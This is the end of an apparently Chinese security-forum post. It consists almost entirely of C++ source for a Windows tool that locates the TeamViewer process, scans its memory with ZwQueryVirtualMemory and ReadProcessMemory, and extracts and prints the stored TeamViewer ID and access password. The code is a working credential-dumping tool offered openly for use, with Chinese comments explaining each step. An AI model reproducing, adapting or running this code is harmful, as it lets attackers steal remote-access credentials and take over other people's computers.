贴一下修改后的代码</p>
<pre blockindex=48><code class="hljs language-c++"><span class=hljs-meta>#<span class=hljs-meta-keyword>include</span><span class=hljs-meta-string>&lt;stdio.h&gt;</span></span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>include</span><span class=hljs-meta-string>&lt;Windows.h&gt;</span></span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>include</span> <span class=hljs-meta-string>&lt;dbghelp.h&gt;</span></span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>pragma</span> comment(lib,<span class=hljs-meta-string>"dbghelp.lib"</span>)</span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>include</span> <span class=hljs-meta-string>&lt;shlwapi.h&gt;</span></span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>include</span> <span class=hljs-meta-string>"tlhelp32.h"</span></span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>include</span> <span class=hljs-meta-string>&lt;psapi.h&gt;</span></span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>include</span> <span class=hljs-meta-string>&lt;regex&gt;</span></span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>if</span> _WIN64</span>
_int64 EndAddress = <span class=hljs-number>0x0007FFFFFFFF0000</span>;
<span class=hljs-meta>#<span class=hljs-meta-keyword>else</span></span>
<span class=hljs-keyword>int</span> EndAddress = <span class=hljs-number>0X7FFF0000</span>;
<span class=hljs-meta>#<span class=hljs-meta-keyword>endif</span> <span class=hljs-comment>//根据位数不同遍历的地址大小不同</span></span>
<span class=hljs-keyword>using</span> <span class=hljs-keyword>namespace</span> std;
<span class=hljs-keyword>typedef</span> <span class=hljs-class><span class=hljs-keyword>enum</span> _<span class=hljs-title>MEMORY_INFORMATION_CLASS</span> {</span>
MemoryBasicInformation,
MemoryWorkingSetList,
MemorySectionName,
MemoryBasicVlmInformation
} MEMORY_INFORMATION_CLASS;
<span class=hljs-function><span class=hljs-keyword>typedef</span> <span class=hljs-title>NTSTATUS</span><span class=hljs-params>(WINAPI* fnZwQueryVirtualMemory)</span> <span class=hljs-params>(
HANDLE ProcessHandle,
PVOID BaseAddress,
MEMORY_INFORMATION_CLASS MemoryInformationClass,
PVOID MemoryInformation,
SIZE_T MemoryInformationLength,
PSIZE_T ReturnLength
)</span></span>;
<span class=hljs-function><span class=hljs-keyword>int</span> <span class=hljs-title>GetPidByName</span><span class=hljs-params>(PCWCHAR procName)</span> </span>{
HANDLE ProcessId = <span class=hljs-built_in>CreateToolhelp32Snapshot</span>(TH32CS_SNAPPROCESS, <span class=hljs-literal>NULL</span>);
<span class=hljs-keyword>if</span> (ProcessId == <span class=hljs-literal>NULL</span>) {
<span class=hljs-built_in>printf</span>(<span class=hljs-string>"Fail"</span>);
}
PROCESSENTRY32 te32 = { <span class=hljs-number>0</span> };
te32.dwSize = <span class=hljs-built_in><span class=hljs-keyword>sizeof</span></span>(te32);
<span class=hljs-keyword>int</span> number = <span class=hljs-number>0</span>;
<span class=hljs-keyword>if</span> (<span class=hljs-built_in>Process32First</span>(ProcessId, &amp;te32)) {
<span class=hljs-keyword>do</span> {
<span class=hljs-keyword>if</span> (!<span class=hljs-built_in>lstrcmp</span>(te32.szExeFile, procName)) {
<span class=hljs-built_in>printf</span>(<span class=hljs-string>"[+]TeamViewer PID: %d\n"</span>, te32.th32ProcessID);
<span class=hljs-keyword>return</span> te32.th32ProcessID;
}
} <span class=hljs-keyword>while</span> (<span class=hljs-built_in>Process32Next</span>(ProcessId, &amp;te32));
}
} <span class=hljs-comment>//用进程名得到PID</span>
<span class=hljs-function><span class=hljs-keyword>int</span> <span class=hljs-title>main</span><span class=hljs-params>()</span> </span>{
MEMORY_BASIC_INFORMATION mbi = { <span class=hljs-number>0</span> }; <span class=hljs-comment>//初始化MEMORY_BASIC_INFORMATION结构</span>
fnZwQueryVirtualMemory ZwQueryVirtualMemory = (fnZwQueryVirtualMemory)<span class=hljs-built_in>GetProcAddress</span>(<span class=hljs-built_in>GetModuleHandleA</span>(<span class=hljs-string>"ntdll.dll"</span>), <span class=hljs-string>"ZwQueryVirtualMemory"</span>);
<span class=hljs-comment>//从ntdll.dll得到ZwQueryVirtualMemory</span>
<span class=hljs-keyword>if</span> (ZwQueryVirtualMemory == <span class=hljs-literal>NULL</span>) {
<span class=hljs-keyword>if</span> (ZwQueryVirtualMemory == <span class=hljs-literal>NULL</span>)
{
<span class=hljs-built_in>printf</span>(<span class=hljs-string>"没有找到ZwQueryVirtualMemory函数"</span>);
<span class=hljs-built_in>system</span>(<span class=hljs-string>"pause"</span>);
<span class=hljs-keyword>return</span> <span class=hljs-number>0</span>;
}
}
<span class=hljs-comment>//如果为NULL就是没找到</span>
HANDLE hProcess = <span class=hljs-built_in>OpenProcess</span>(PROCESS_ALL_ACCESS, <span class=hljs-number>0</span>, <span class=hljs-built_in>GetPidByName</span>(<span class=hljs-string>L"TeamViewer.exe"</span>));
_int64 StartAddress = <span class=hljs-number>0x000000007FFE0000</span>;
<span class=hljs-keyword>do</span> {
<span class=hljs-built_in>ZwQueryVirtualMemory</span>(hProcess, (LPVOID)StartAddress, MemoryBasicInformation, &amp;mbi, <span class=hljs-built_in><span class=hljs-keyword>sizeof</span></span>(mbi), <span class=hljs-literal>NULL</span>); <span class=hljs-comment>//从基地址开始遍历将内存信息存放MEMORY_BASIC_INFORMATION结构</span>
<span class=hljs-keyword>if</span> (mbi.RegionSize == <span class=hljs-number>0x1FF000</span>) { <span class=hljs-comment>//查看内存大小是否为1FF000</span>
<span class=hljs-keyword>int</span> id_temp = <span class=hljs-number>0</span>; <span class=hljs-comment>//临时变量找到了就改为1避免重复读取</span>
<span class=hljs-keyword>char</span> password_temp = <span class=hljs-number>0</span>; <span class=hljs-comment>//同上</span>
<span class=hljs-keyword>for</span> (<span class=hljs-keyword>int</span> i = <span class=hljs-number>0</span>; i &lt; <span class=hljs-number>0x1FF000</span>; i++) {
<span class=hljs-keyword>char</span> id[<span class=hljs-number>0x17</span>]; <span class=hljs-comment>//存放id的char数组因为是unicode字符所以要双倍大小加上前面的0x80和后面的0x000x00</span>
<span class=hljs-keyword>char</span> id_char[<span class=hljs-number>0xA</span>] = { <span class=hljs-number>0</span> }; <span class=hljs-comment>//unicode转换为ASCII存放的数组</span>
<span class=hljs-keyword>char</span> password[<span class=hljs-number>0x15</span>]; <span class=hljs-comment>//存放密码的unicode数组加上前面的0x88和后面的0x000x00</span>
<span class=hljs-keyword>char</span> password_char[<span class=hljs-number>0x9</span>] = { <span class=hljs-number>0</span> }; <span class=hljs-comment>//同上</span>
<span class=hljs-built_in>ReadProcessMemory</span>(hProcess, (LPVOID)((_int64)mbi.BaseAddress + i), password, <span class=hljs-number>0x15</span>, <span class=hljs-literal>NULL</span>);
<span class=hljs-built_in>ReadProcessMemory</span>(hProcess, (LPVOID)((_int64)mbi.BaseAddress + i), id, <span class=hljs-number>0x17</span>, <span class=hljs-literal>NULL</span>);
<span class=hljs-comment>//内存中读出数据</span>
<span class=hljs-keyword>for</span> (<span class=hljs-keyword>int</span> x = <span class=hljs-number>0</span>; x &lt;= <span class=hljs-number>0x8</span>; x++) {
password_char[x] = password[x * <span class=hljs-number>2</span> + <span class=hljs-number>2</span>];
}
<span class=hljs-comment>//将0x00去除写入password_char数组</span>
password_char[<span class=hljs-number>8</span>] = <span class=hljs-string>'\x00'</span>; <span class=hljs-comment>//最后加上\x00结尾</span>
<span class=hljs-keyword>if</span> (password[<span class=hljs-number>1</span>] == <span class=hljs-number>0xffffff90</span> &amp;&amp; password[<span class=hljs-number>17</span>] == <span class=hljs-number>0</span> &amp;&amp; password[<span class=hljs-number>18</span>] == <span class=hljs-number>0</span> &amp;&amp; <span class=hljs-built_in>regex_match</span>(password_char, <span class=hljs-built_in>regex</span>(<span class=hljs-string>"[0-9a-z]{8}"</span>))) {
<span class=hljs-built_in>printf</span>(<span class=hljs-string>"[+]password: %s\n"</span>, password_char);
password_temp = <span class=hljs-number>1</span>;
}
<span class=hljs-comment>//判断password[1]是否为0x8817,18位是否为00最后正则匹配password_char</span>
<span class=hljs-keyword>for</span> (<span class=hljs-keyword>int</span> x = <span class=hljs-number>0</span>; x &lt;= <span class=hljs-number>0x9</span>; x++) {
id_char[x] = password[x * <span class=hljs-number>2</span> + <span class=hljs-number>2</span>];
}
<span class=hljs-comment>//同上</span>
id_char[<span class=hljs-number>9</span>] = <span class=hljs-string>'\x00'</span>;
<span class=hljs-keyword>if</span> (id_temp == <span class=hljs-number>0</span> &amp;&amp; id[<span class=hljs-number>0</span>] == <span class=hljs-number>0x20</span> &amp;&amp; id[<span class=hljs-number>19</span>] == <span class=hljs-number>0</span> &amp;&amp; id[<span class=hljs-number>20</span>] == <span class=hljs-number>0</span> &amp;&amp; <span class=hljs-built_in>regex_match</span>(id_char, <span class=hljs-built_in>regex</span>(<span class=hljs-string>"[0-9]{9}"</span>))) {
<span class=hljs-built_in>printf</span>(<span class=hljs-string>"[+]id: %s\n"</span>, id_char);
id_temp = <span class=hljs-number>1</span>;
}
<span class=hljs-comment>//这里和上面差不多id_temp == 0 是因为ID会出现多个相同的值所以只要取到一次就不用再取了</span>
<span class=hljs-keyword>if</span> (id_temp == <span class=hljs-number>1</span> &amp;&amp; password_temp == <span class=hljs-number>1</span>) {
<span class=hljs-keyword>break</span>;
}
<span class=hljs-comment>//如果id_temp和password_temp都为1说明已经都取到了就可以跳出循环了</span>
}
<span class=hljs-keyword>break</span>;
}
StartAddress += mbi.RegionSize; <span class=hljs-comment>//不是就加上当前内存块大小继续遍历</span>
} <span class=hljs-keyword>while</span> (<span class=hljs-number>0</span> &lt;= StartAddress);
}
</code></pre>
<p blockindex=49><img src="
</div>
<div class="post-opt mt-30">
<ul class="list-inline text-muted">
<li>
<i class="fa fa-clock-o"></i>
发表于 2021-12-27 14:56:30
</li>
<li>阅读 ( 6524 )</li>
<li>分类:<a href=https://forum.butian.net/community/develop target=_blank rel="noopener noreferrer">安全开发</a>
</li>
</ul>
</div>
</div>
</div>
</div>
</div>
</div>
</div>